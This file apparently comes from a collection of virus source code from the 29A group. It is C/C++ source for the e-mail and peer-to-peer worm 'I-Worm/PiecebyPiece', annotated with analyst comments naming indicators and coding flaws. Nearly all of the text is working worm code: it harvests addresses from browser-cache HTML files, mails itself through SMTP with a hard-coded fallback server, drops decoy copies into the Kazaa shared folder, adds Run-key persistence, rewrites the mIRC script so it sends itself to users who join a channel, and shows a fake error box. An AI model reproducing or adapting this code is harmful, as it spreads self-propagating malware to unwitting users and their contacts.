
📄 29a-7.014

📁 从29A上收集的病毒源码
j=strlen(key2);
for (i=0;i<8;i++){
key2[j+i]=acc[i];
}
key2[j+i]=0;
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
RegCloseKey(hKey);
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
i=0;							//the new one
while (smtp[i]!=0) {
	server[i]=smtp[i]; //Now this is the SMTP server
	i++;	
	}
server[i]=0;
//Get the e-mail
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
RegCloseKey(hKey);
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
i=0;						  //the new one
while (eml[i]!=0) {
	email[i]=eml[i]; //Now this is the "FROM:" e-mail
	i++;
	}
email[i]=0;
}
//Set a new "HELO" domain
i=strlen(email)-1;
j=0;
while (email[i]!='@') {
	helo[j]=email[i];
	j++;
	i--;
	}
}
helo[j]=0;
strrev(helo);
//end
}

//--------------------------------------FINDMAIL----------------------------------------------

// Analyst summary: address harvesting. Reads the given file in chunks of up to 255
// characters, looks for the first "mailto:" in each chunk and copies the text that
// follows it into the global table emails[], after advancing the global counter c.
// Both emails and c are declared outside this view.
// Copying stops at the first of: '"' (34), ':' (58), ' ' (32), '>' (62), '?' (63).
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
{
int ik,j=0;
char lin[256],*start,ch[1];

fstream f(file,ios::in);
while (f.get(lin,256))
{
// strstr returns only the first hit, so at most one address is taken per chunk read.
start=strstr(lin,"mailto:");
if (start!=0)
 {
 j=0;
 c++;
 // 7 is the length of "mailto:"; ik indexes the first character after the prefix.
 ik=start-lin+7;
 // NOTE(review): ch is declared as char ch[1], so ch[1] is one element past the array.
 ch[1]=lin[ik];
 // NOTE(review): the loop tests neither the NUL that ends lin nor any limit on j or c;
 // the dimensions of emails[] are not visible here.
 while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
  {
  emails[c][j]=ch[1];
  j++;
  ik++;
  ch[1]=lin[ik];
  }
emails[c][j]=0;
}
// Consumes one character after each chunk (the delimiter that get(lin,256) leaves in the stream).
f.get();
}
f.close();
}

//--------------------------------------FINDFILES---------------------------------------------

// Analyst summary: walks two directory levels below
// <windir>\Temporary Internet Files (windir is a global filled elsewhere), picking at
// each level the first entry whose attributes are exactly DIRECTORY+SYSTEM, then passes
// up to 70 "*.htm" entries of the resulting directory to findmail().
// Observable behaviour for defenders: a non-browser process enumerating and reading
// .htm files inside the browser cache directory.
void findfiles() { //Searches for .htm files in the temp. directories
WIN32_FIND_DATA f;
HANDLE hf;
int k=0;
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];

// Level 1: find a DIRECTORY+SYSTEM entry among the first ~20 results.
// NOTE(review): no FindFirstFile result in this function is compared with
// INVALID_HANDLE_VALUE, and pth1/pth3 stay uninitialised when no entry matches.
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\*");
hf=FindFirstFile(pth2,&f);
// Setting k=20 is how a match ends the search: the loop below requires k<20.
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
	if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
	k++;
}
FindClose(hf);
// Level 2: same search inside the directory found above; the name goes to pth3.
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\*");
k=0;
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
	if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
	k++;
}
FindClose(hf);
// pth  = <windir>\Temporary Internet Files\<pth1>\<pth3>\   (prefix for full file paths)
// pth2 = the same directory with the search mask \*.htm appended
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\");
strcat(pth2,pth3);
strcpy(pth,pth2);
strcat(pth,"\\");
strcat(pth2,"\\*.htm");
k=0;
hf=FindFirstFile(pth2,&f);
// The entry returned by FindFirstFile itself is never passed to findmail(): the loop
// calls FindNextFile before it looks at f. At most 70 iterations are made.
while (FindNextFile(hf,&f)!=0 && k<70) {
	if (f.cFileName[0]!='.') {
		strcpy(path,pth);
		strcat(path,f.cFileName);
		findmail(path);
	}
	k++;
}
FindClose(hf);
}

//--------------------------------------CONECT------------------------------------------------

// Analyst summary: opens a direct SMTP session. Resolves the global host name `server`,
// connects over TCP to port 25, reads the greeting and calls sendmail() (defined outside
// this view) when the greeting starts with "220". Sets the globals `connected` and `err`.
// Returns 0 on every failure path shown.
// Observable behaviour for defenders: outbound TCP/25 from a workstation process that is
// not a mail client.
// i, version, wsaData, theSocket, nRet, Buf, connected and err are globals declared elsewhere.
int conect() { //Connects to a server using "Winsock"

// Start up Winsock
i=WSAStartup(version, &wsaData);
if (i!=0) {return(0);}

// Store information about the server
LPHOSTENT lpHostEntry;

lpHostEntry = gethostbyname(server);
if (lpHostEntry == NULL) {
WSACleanup();
connected=0;
return(0);
// connected is set to 1 as soon as the name resolves, before any socket is opened.
} else connected=1; //This means we're connected
//Get important data
// findserver() and findfiles() are called only while err is still 0.
if (err==0) { //If we didn't run this allready and got an error
	findserver();
	findfiles();
}
// Create the socket
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);	
if (theSocket == INVALID_SOCKET) {
WSACleanup();
connected=0;
return(0);
}

SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
// First address from the gethostbyname() result obtained above.
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = htons(25);
// Connect to the server
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));	
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}

// Read the server greeting into the global buffer Buf.
nRet = recv(theSocket,Buf,sizeof(Buf),0);			
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}

// A reply whose first digit is 4 or 5 sets err; callers shown on this page react to
// err by switching to the hard-coded server.
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
sendmail();
}
//Close the connection
closesocket(theSocket);
// Shutdown Winsock
WSACleanup();
// NOTE(review): no return statement on this path although the function is declared int.
}

//--------------------------------------KAZAA-----------------------------------------------

// Analyst summary: peer-to-peer propagation. Reads the Kazaa download directory from
// HKCU\Software\Kazaa\Transfer (value "DlDir0") and copies `file` into it under one of
// four decoy names.
// Indicators visible in this block: files named mirc6.exe, winamp3.exe, wincrack.exe or
// icq2002.exe appearing in the Kazaa shared directory.
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
int i;
char kaza[256],kfile[3][20];
unsigned char kpth[1024];
DWORD kpthlen=sizeof(kpth);
HKEY hKey;

//The filenames
strcpy(kfile[0],"\\mirc6.exe");
strcpy(kfile[1],"\\winamp3.exe");
strcpy(kfile[2],"\\wincrack.exe");
// NOTE(review): kfile is declared with 3 rows, so index 3 is outside the array.
strcpy(kfile[3],"\\icq2002.exe");
//Get the path to Kazaa from the reg.
// Return values of the registry calls are not checked; kpth is not initialised.
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
RegCloseKey(hKey);
// The path is accepted when its first byte lies between 65 and 122 (ASCII 'A'..'z').
// kaza is filled only in that case, and the copy has no length limit (kaza holds 256
// bytes, kpth 1024).
if (kpth[0]>64 && kpth[0]<123) {
i=0;						
while (kpth[i]!=0) {
	kaza[i]=kpth[i];
	i++;
	}
kaza[i]=0;
}
// `time` is a global declared outside this view; the seed is the current second.
GetSystemTime(&time);
srand(time.wSecond);
// Each test draws a new rand() value; when none of them is 0 no file name is appended
// and kaza is still only the directory path.
if (rand()%5==0) strcat(kaza,kfile[3]);
 else if (rand()%4==0) strcat(kaza,kfile[2]);
  else if (rand()%3==0) strcat(kaza,kfile[1]);
   else if (rand()%2==0) strcat(kaza,kfile[0]);
// FALSE = an existing file of the same name is overwritten.
CopyFile(file,kaza,FALSE);
}

//--------------------------------------INFECTWIN-------------------------------------------

// Analyst summary: installation and persistence. Copies `file` to
// <windir>\System\winsys<number>.exe and registers that path to run at logon.
// Indicators visible in this block:
//   - file  <windir>\System\winsys<decimal rand() value>.exe
//   - value "Windows task32 sys" under
//     HKCU\Software\Microsoft\Windows\CurrentVersion\Run
// winbkup, windir, zippth and time are globals declared outside this view.
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
HKEY hKey;
unsigned char val[256];
char rnd[6];
int i=0;

strcpy(winbkup,windir);
strcat(winbkup,"\\System\\winsys");
// The numeric suffix is rand() seeded with the current second.
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(winbkup,rnd);
strcat(winbkup,".exe");
//Copy file to Windows
// TRUE = the copy fails if the target already exists; the result is not checked.
CopyFile(file,winbkup,TRUE);
//Just in case there is no WinZip, use this path
strcpy(zippth,winbkup);
//Now make Windows run it at startup
// Byte-wise copy of the path into val; no check against the 256-byte size of val.
while (winbkup[i]!=0) {
	val[i]=winbkup[i];
	i++;
	}
val[i]=0;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
// The data length passed is sizeof(val) (256), not the string length, so the stored
// value can carry uninitialised bytes after the terminating NUL.
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
RegCloseKey(hKey);
}

//--------------------------------------MIRC--------------------------------------------------

// Analyst summary: IRC propagation. Derives the mIRC directory from the
// "UninstallString" value under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\mIRC and overwrites
// script.ini there with a script that sends the file named by the global zippth over
// DCC to every nick that joins a channel, and joins #piecebypiece on start.
// Indicators visible in this block: a script.ini in the mIRC directory containing
// "/dcc send $nick" and "/join #piecebypiece".
void mirc() { //Creates a mIRC script
HKEY hKey;
unsigned char mircpth[1024];
char mirc[MAX_PATH];
int i=0;
DWORD mircpthlen=sizeof(mircpth);

//Get the path from our friend: the registry :)
// Return values are not checked; mircpth is not initialised if the value is missing.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
RegCloseKey(hKey);
// Copy starts at index 1 (presumably to skip a leading quote - not confirmed here) and
// stops at the first '.' or NUL. No check against MAX_PATH.
i=1;
while (mircpth[i]!=0 && mircpth[i]!='.') {
	mirc[i-1]=mircpth[i];
	i++;
	}
mirc[i-1]=0;
// Cut the string back to the last backslash (92) so that only the directory remains.
// NOTE(review): the loop has no lower bound on i if the string holds no backslash.
i=strlen(mirc);
while (mirc[i]!=92) {
	mirc[i]=0;
	i--;
	}
strcat(mirc,"script.ini");
//Write a new script.ini
// ios::out truncates an existing script.ini.
fstream f(mirc,ios::out);
f<<"[Script]"<<endl;
f<<"n0=ON 1:JOIN:#:{"<<endl;
f<<"n1=/dcc send $nick "<<zippth<<endl;
f<<"n2=}"<<endl;
f<<"n3=on 1:start:{"<<endl;
f<<"n4= /join #piecebypiece"<<endl;
f<<"n5=}"<<endl;
f.close();

}

//--------------------------------------ZIPIT-------------------------------------------------

// Analyst summary: packaging. If WinZip is registered under
// HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\winzip32.exe, launches it
// hidden to archive `file` into <windir>\System\win32sys<number>.zip and stores that
// archive path in the global zippth; otherwise zippth is set to `file` itself.
// Indicators visible in this block: winzip32.exe started with SW_HIDE and the arguments
// " -a -r <zip> <file>", and a win32sys<number>.zip file in <windir>\System.
// zippth, windir, time and hwnd are globals declared outside this view.
void zipit(char *file) { //Zips the virus with a random name
HKEY hKey;
unsigned char zip[1024];
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
int i=0;
DWORD ziplen=sizeof(zip);

//Get the path from the registry
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
// "" selects the key's default value; the result of the query is not checked.
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
RegCloseKey(hKey);
// Byte-wise copy with no check against MAX_PATH (zip holds up to 1024 bytes).
i=0;
while (zip[i]!=0) {
	zippath[i]=zip[i];
	i++;
	}
zippath[i]=0;
//Make a random filename for the .zip file
strcpy(zippth,windir);
strcat(zippth,"\\System\\win32sys");
// The numeric suffix is rand() seeded with the current second.
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(zippth,rnd);
strcat(zippth,".zip");
//Zip it!
// param is built by plain concatenation; the paths are not quoted.
strcpy(param," -a -r ");
strcat(param,zippth);
strcat(param," ");
strcat(param,file);
// SW_HIDE: the archiver runs without a visible window.
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
} else strcpy(zippth,file); //Else just use the executable file for mIRC

}

//--------------------------------------TIMERPROC---------------------------------------------

// Analyst summary: timer callback that retries the SMTP connection. While the global
// `sending` is 0 it calls conect(); if `err` is non-zero afterwards it overwrites the
// globals server/email/helo with the hard-coded values below and calls conect() again.
// The timer `tim` is removed once `connected` is 1; the process itself keeps running.
// sending, err, connected, server, email, helo and tim are globals declared elsewhere.
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
	
if (sending==0) { //Check for a connection if a mail is not under delivery
	conect();
	if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
		// Fallback SMTP host, sender address and HELO domain.
		strcpy(server,"smtp.barrysworld.com");
		strcpy(email,"john@barrysworld.com");
		strcpy(helo,"barrysworld.com");
		conect();
		}
	if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
	}
}

//--------------------------------------PAYLOAD-----------------------------------------------
// Analyst summary: the payload only displays a system-modal message box with the text
// below; the window title "I-Worm/PiecebyPiece" is a string usable for identifying the
// sample. No other action is taken in this function.
void payload() { //Every virus MUST have a payload ;)
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
}

//--------------------------------------------------------------------------------------------
//Main function
//--------------------------------------------------------------------------------------------

// Analyst summary: entry point. Creates a hidden window (class "ClassName", title
// "NEWWIN"), checks an infection marker in the registry, and on first run performs the
// installation/propagation steps in the order shown, followed by a decoy error box.
// On every run it then attempts the SMTP connection and, if that fails, installs a
// 50-second retry timer before entering the message loop.
// Indicators visible in this block:
//   - registry value "infected" = "yes" under HKLM\Software\RedCell
//   - message box "This program has performed an illegal operation" / "Error"
//   - hidden top-level window with class "ClassName" and title "NEWWIN"
// hwnd, ProcessId, windir, filename, winbkup, time, err, connected, server, email, helo
// and tim are globals; processes() and base64() are defined outside this view.
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
WNDCLASSEX wndc;
MSG msg; 	
HKEY hKey;
unsigned char buf[1024],inf[]="yes";
DWORD buflen=sizeof(buf);
int first=0;

//Create a window
wndc.cbClsExtra = 0;
wndc.cbSize = sizeof(wndc);
wndc.cbWndExtra = 0;
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
wndc.hInstance = hInstance;
wndc.lpfnWndProc = WndProc;
wndc.lpszClassName = "ClassName";
wndc.lpszMenuName = NULL;
wndc.style = CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wndc);
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
UpdateWindow(hwnd);
//Hide the window
// The window is never shown; it exists to own the timer and the message loop below.
ShowWindow(hwnd,SW_HIDE);
//Get the filename and disable (if possible) any AVs
// processes() is not visible here; the original comment above is the only description.
GetWindowThreadProcessId(hwnd,&ProcessId);
processes();
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
//Check if the comp. was infected before
// NOTE(review): buf is not initialised and the registry return codes are not checked,
// so when the key is absent the test below reads indeterminate stack data.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
RegCloseKey(hKey);
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
{
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
//Create a key in the registry to mark the PC as infected
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
RegCloseKey(hKey);
//----INFECT COMPUTER----
// Order matters: infectwin() fills winbkup, which zipit() packs; mirc() then uses the
// zippth set by zipit()/infectwin().
infectwin(filename);
kazaa(filename);
zipit(winbkup);
mirc();
base64(filename);
conect();
first=1;
// Decoy: shown only on the first run, after the steps above have completed.
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
}
base64(filename);
// Date trigger: the payload fires when the system date (GetSystemTime, i.e. UTC) is 15 September.
GetSystemTime(&time);
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
if (first==0) {
	base64(filename); //Write a "base64" encoded file every time (just in case)
	conect(); //Try to connect
	if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
		// Fallback SMTP host, sender address and HELO domain.
		strcpy(server,"smtp.barrysworld.com");
		strcpy(email,"john@barrysworld.com");
		strcpy(helo,"barrysworld.com");
		conect();
		}
}
// 50000 ms timer; TimerProc repeats the connection attempt until `connected` is 1.
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.

// Standard message loop; keeps the process alive until WM_QUIT.
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
	TranslateMessage(&msg);
	DispatchMessage(&msg);
}
return msg.wParam;
//end of main()
}

//--------------------------------------WNDPROC----------------------------------------------

// Window procedure for the hidden window created in WinMain.
// WM_PAINT is acknowledged with an empty BeginPaint/EndPaint pair (nothing is drawn),
// WM_DESTROY posts WM_QUIT with exit code 0, and every other message is passed to
// DefWindowProc unchanged.
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
	if (iMsg == WM_PAINT) {
		PAINTSTRUCT paint;
		HDC dc = BeginPaint(hwnd,&paint);
		(void)dc; // the device context is obtained but not used
		EndPaint(hwnd,&paint);
		return 0;
	}

	if (iMsg == WM_DESTROY) {
		PostQuitMessage(0);
		return 0;
	}

	return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
//That's all folks! e-mail to: MI_pirat@yahoo.com , web: www.virus.isfunny.com || www.red-cell.tk
